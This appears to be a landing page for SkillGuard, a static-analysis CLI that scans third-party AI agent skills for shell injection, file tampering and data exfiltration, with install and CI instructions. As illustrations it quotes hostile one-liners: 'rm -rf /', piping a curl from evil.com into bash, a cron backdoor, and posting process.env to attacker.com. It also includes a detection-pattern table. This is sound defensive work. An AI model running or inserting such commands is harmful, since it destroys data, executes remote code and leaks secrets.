Open Source Security Tool

Catch Security Threats in AI Agent Skills
Before They Hit Production

SkillGuard is a static analysis CLI that scans JavaScript and TypeScript codebases to detect shell injection, file tampering, and data exfiltration—before third-party AI agent skills touch your system.

Try Live Demo View on GitHub
Terminal
$ npx skillguard scan ./untrusted-skill
Scan complete in 847ms
CRITICAL Shell Execution detected
└─ exec('rm -rf /') at line 42
HIGH File System Write detected
└─ fs.writeFileSync('/etc/passwd', ...) at line 58
Risk Score: 92/100Do not install
15+ Attack Patterns
AST Based Analysis
JS/TS File Support
CI/CD Ready
The Problem

AI Agent Skills Are a New Attack Vector

Third-party skills execute with host system permissions. Without scanning, you're blindly trusting unknown code.

CRITICAL

Remote Code Execution

Malicious skills use exec(), eval(), or new Function() to run arbitrary commands, install backdoors, or pivot to other systems.

exec('curl evil.com/payload | bash')
HIGH

File System Attacks

Skills can read, overwrite, or delete files—including SSH keys, credentials, and system configurations.

fs.writeFileSync('/etc/cron.d/backdoor', ...)
MEDIUM

Data Exfiltration

Network-enabled skills can silently POST environment variables, API keys, and sensitive data to external servers.

fetch('https://attacker.com', { body: process.env })
SUPPLY CHAIN

Dependency Attacks

Typosquatting, compromised packages, and malicious transitive dependencies introduce vulnerabilities without touching source code.

npm install lodahs // typosquatting
Capabilities

What SkillGuard Detects

AST-based pattern matching identifies real threats—not regex false positives.

Severity Pattern Risk Description Score
CRITICAL exec(), spawn(), execSync() Arbitrary shell command execution +50
CRITICAL eval(), new Function() Dynamic code execution / injection +50
HIGH fs.writeFile(), fs.unlink() File system write/delete operations +30
HIGH Deno.remove(), Deno.writeFile() Deno runtime file modifications +30
MEDIUM fetch(), axios(), http.request() Network access / potential exfiltration +20
LOW process.env.SECRET_* Sensitive environment variable access +10

Dependency Scanning

Checks package.json against known malicious packages and typosquatting patterns.

JSON Output Mode

Machine-readable output for CI/CD pipelines and automated security gates.

Sub-Second Scans

Scans complete in milliseconds—ideal for pre-commit hooks and real-time checks.

Try It

Interactive Security Scanner

Paste code below or load a preset to see SkillGuard in action.

source.js
Output
Click "Run Security Analysis" to scan the code...
Get Started

Installation

Quick Run (npx)

Run immediately without installing.

npx skillguard scan ./path/to/skill

Global Install

Install globally for repeated use.

npm install -g skillguard

From Source

Clone and build from the repository.

git clone https://github.com/gauravsingh1995/skillgaurd.git
cd skillgaurd && npm i && npm run build

GitHub Actions Integration

Use the --json flag for CI/CD pipelines:

- name: Security Scan
  run: |
    npx skillguard scan ./skills --json > results.json
    if [ $? -eq 1 ]; then
      echo "Security vulnerabilities detected"
      exit 1
    fi